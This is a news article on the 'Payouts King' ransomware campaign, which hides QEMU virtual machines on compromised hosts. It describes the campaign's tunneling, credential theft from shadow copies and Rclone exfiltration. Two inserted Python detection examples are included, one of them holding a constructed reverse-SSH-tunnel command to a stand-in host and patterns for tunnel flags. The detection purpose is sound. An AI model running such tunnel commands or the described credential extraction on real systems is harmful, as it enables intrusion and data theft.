The Payouts King ransomware campaign reportedly uses hidden QEMU virtual machines and covert tunnels to bypass security tools and deepen network compromise.

New Ransomware Threat Alarm: ‘Payouts King’ Hides Inside Virtual Machines to Dodge Detection

The420.in Staff

New Delhi: A new and highly sophisticated trend in the global cybersecurity landscape has raised serious concerns. The ‘Payouts King’ ransomware no longer relies on conventional attack techniques; instead, it hides within virtual machines (VMs), making it extremely difficult for modern endpoint security solutions to detect its presence. A recent report by cybersecurity firm Sophos has revealed detailed insights into this complex attack method.

According to the report, attackers are leveraging the open-source virtualization tool QEMU to deploy hidden virtual machines within compromised systems. Since most security tools are limited to scanning the host environment, they cannot inspect activities within these VMs. This allows threat actors to execute malicious payloads, store stolen data, and operate undetected for extended periods.


Full Attack Infrastructure Hidden Inside Alpine Linux VM

Investigations show that attackers create a scheduled task named ‘TPMProfiler,’ which runs with SYSTEM privileges and launches a concealed VM. This virtual machine operates on Alpine Linux and comes preloaded with multiple malicious tools. These include AdaptixC2, Chisel, BusyBox, and Rclone, which are used for remote command execution, data transfer, and network tunneling.

To avoid suspicion, attackers disguise virtual disk files as database or DLL files, making them appear legitimate within the system. They then establish covert SSH tunnels, enabling remote access and communication between the infected machine and external servers.
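Disguising a virtual disk as a database or DLL file only changes its name, not its contents. The following added example (not from the Sophos report or any tool it names) shows how a defender can check for that mismatch: QEMU's default QCOW2 format begins with the magic bytes `QFI\xfb` and a version field, so a file called `cache.dll` or `store.mdb` that starts that way is worth a closer look. The sample headers, file names and the `DISK_IMAGE_EXTENSIONS` list are constructed for illustration.

```python
import os
import struct

# QCOW2 images start with the magic "QFI\xfb" followed by a big-endian
# uint32 version field (2 or 3). Raw images carry no magic, so this check
# only catches the QCOW2 case.
QCOW2_MAGIC = b"QFI\xfb"
DISK_IMAGE_EXTENSIONS = {".qcow2", ".qcow", ".img", ".raw", ".vhd", ".vhdx", ".vmdk", ".vdi"}


def is_qcow2_header(head: bytes) -> bool:
    """True if the first 8 bytes look like a QCOW2 image header."""
    if len(head) < 8 or head[:4] != QCOW2_MAGIC:
        return False
    (version,) = struct.unpack(">I", head[4:8])
    return version in (2, 3)


def classify(filename: str, head: bytes) -> str:
    """Compare what the extension claims with what the header says."""
    ext = os.path.splitext(filename)[1].lower()
    if is_qcow2_header(head):
        return "qcow2-expected" if ext in DISK_IMAGE_EXTENSIONS else "qcow2-masquerade"
    return "other"


def scan_directory(root: str) -> list:
    """Walk a tree and return paths whose content is QCOW2 but whose
    extension suggests something else (e.g. .dll or .mdb)."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                with open(path, "rb") as fh:
                    head = fh.read(8)
            except OSError:
                continue  # unreadable or vanished file; skip rather than abort the hunt
            if classify(name, head) == "qcow2-masquerade":
                findings.append(path)
    return findings


# Constructed sample headers (not real files from any incident).
SAMPLES = {
    "cache.dll": QCOW2_MAGIC + struct.pack(">I", 3) + b"\x00" * 8,      # VM disk hiding as a DLL
    "msvcp140.dll": b"MZ\x90\x00\x03\x00\x00\x00",                     # ordinary PE header
    "alpine.qcow2": QCOW2_MAGIC + struct.pack(">I", 2) + b"\x00" * 8,   # image with honest extension
    "store.mdb": b"\x00\x01\x00\x00Stan",                               # Access/Jet database header
}


def triage_samples() -> dict:
    return {name: classify(name, head) for name, head in SAMPLES.items()}


if __name__ == "__main__":
    for name, verdict in triage_samples().items():
        print(f"{name:15s} {verdict}")
```

Run `scan_directory` over locations where the host's software would not normally keep disk images (profile and ProgramData folders, web roots, database directories). A raw-format image has no header signature, so pair this check with size and modification-time anomalies rather than relying on it alone.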

Initial Access via VPN Exploits and Social Engineering

The ransomware operators use multiple entry points to infiltrate networks. These include exposed VPN systems such as SonicWall and Cisco SSL VPN, as well as vulnerabilities in software like SolarWinds Web Help Desk.

In more recent attacks, social engineering tactics have been observed. Attackers impersonate IT support personnel and contact employees via Microsoft Teams, convincing them to install Quick Assist. Once access is granted, attackers gain full control over the system.

Data Theft and Deep Network Compromise

After gaining entry, attackers use Volume Shadow Copy Service (VSS) tools to create shadow copies and extract critical system files from them, such as NTDS.dit and the SAM and SYSTEM registry hives. This enables them to harvest credentials and gain control over the entire network.

Stolen data is then exfiltrated to remote servers using Rclone. In several cases, attackers have conducted advanced operations such as Active Directory mapping, user enumeration, and Kerberos-based attacks to deepen their access.

Another report suggests that ‘Payouts King’ may be linked to former members of the BlackBasta gang. The attack techniques—such as spam bombing, phishing, and misuse of Quick Assist—closely resemble tactics previously used by BlackBasta operators.

The ransomware employs strong encryption methods, including AES-256 and RSA-4096, making data recovery nearly impossible without decryption keys. It also uses intermittent encryption for large files to speed up the attack.

Expert Warning and Prevention Measures

Cybersecurity experts warn that this approach represents a major challenge for traditional defense systems. Organizations are advised to monitor for unauthorized QEMU installations, suspicious scheduled tasks running with SYSTEM privileges, unusual SSH tunneling, and abnormal network traffic.
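The indicators listed above translate naturally into a few triage rules over endpoint telemetry. The following added example (not part of the report or of any vendor product) runs such rules over a handful of constructed scheduled-task and process-creation records in the style of Windows Security/Sysmon events: a QEMU binary being executed, a SYSTEM-level scheduled task whose action launches QEMU or lives in a user-writable directory, and `ssh.exe` invoked with port-forwarding flags. The record field names, paths, host names and task names are assumptions made for the example.

```python
import re
from typing import Dict, List, Tuple

# Constructed records; field names are an assumption, not a real log schema.
EVENTS: List[Dict[str, str]] = [
    {"event": "TaskCreated", "task": "\\TPMProfiler", "principal": "SYSTEM",
     "action": r"C:\ProgramData\Intel\qemu-system-x86_64.exe -nographic -drive file=C:\ProgramData\Intel\cache.mdb"},
    {"event": "ProcessCreate", "user": "NT AUTHORITY\\SYSTEM",
     "image": r"C:\ProgramData\Intel\qemu-system-x86_64.exe",
     "cmdline": r"qemu-system-x86_64.exe -nographic -drive file=C:\ProgramData\Intel\cache.mdb,format=qcow2"},
    {"event": "ProcessCreate", "user": "CORP\\jdoe",
     "image": r"C:\Windows\System32\OpenSSH\ssh.exe",
     "cmdline": "ssh.exe -N -R 2222:127.0.0.1:3389 relay.example.invalid"},
    {"event": "TaskCreated", "task": "\\Microsoft\\Windows\\Defrag\\ScheduledDefrag", "principal": "SYSTEM",
     "action": r"%windir%\system32\defrag.exe -c -h -o -$"},
    {"event": "ProcessCreate", "user": "CORP\\jdoe",
     "image": r"C:\Windows\System32\notepad.exe", "cmdline": "notepad.exe notes.txt"},
]

# QEMU system emulators and the image tool, with or without .exe.
QEMU_RE = re.compile(r"qemu-system-[a-z0-9_]+(\.exe)?|qemu-img(\.exe)?", re.I)
# Directories a standard user can write to; a SYSTEM task running from here is unusual.
USER_WRITABLE_RE = re.compile(r"(C:\\ProgramData\\|C:\\Users\\[^\\]+\\AppData\\|\\Temp\\)", re.I)
# OpenSSH flags that set up reverse (-R), local (-L) or dynamic (-D) forwards,
# or keep a session open without a shell (-N).
SSH_TUNNEL_RE = re.compile(r"(^|\s)-(R|L|D|N)(\s|$)")


def check_event(ev: Dict[str, str]) -> List[str]:
    """Return the names of every rule the record trips (empty list if clean)."""
    hits: List[str] = []
    if ev["event"] == "ProcessCreate":
        if QEMU_RE.search(ev["image"]):
            hits.append("qemu-process")
        if ev["image"].lower().endswith("ssh.exe") and SSH_TUNNEL_RE.search(ev["cmdline"]):
            hits.append("ssh-tunnel-flags")
    elif ev["event"] == "TaskCreated" and ev["principal"].upper() == "SYSTEM":
        if QEMU_RE.search(ev["action"]):
            hits.append("system-task-launches-qemu")
        if USER_WRITABLE_RE.search(ev["action"]):
            hits.append("system-task-from-user-writable-path")
    return hits


def triage(events: List[Dict[str, str]]) -> List[Tuple[str, List[str]]]:
    """Pair each suspicious record's task name or image path with its rule hits."""
    results = []
    for ev in events:
        hits = check_event(ev)
        if hits:
            results.append((ev.get("task") or ev.get("image", "?"), hits))
    return results


if __name__ == "__main__":
    for subject, hits in triage(EVENTS):
        print(f"{subject}: {', '.join(hits)}")
```

The built-in defrag task runs as SYSTEM too but trips no rule, which is the point of combining the principal check with the action's location and content rather than alerting on every SYSTEM task. Feed the same functions with real 4698 (task created) and 4688/Sysmon 1 (process created) events by mapping their fields onto the record shape shown.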

“This is a dangerous evolution where attackers exploit blind spots in security systems. Malware hidden inside virtual machines signals a new wave of advanced cyber threats,” a cybersecurity analyst noted.

Experts recommend adopting multi-layered security strategies, timely patch management, and continuous employee awareness training to effectively defend against such sophisticated ransomware attacks.
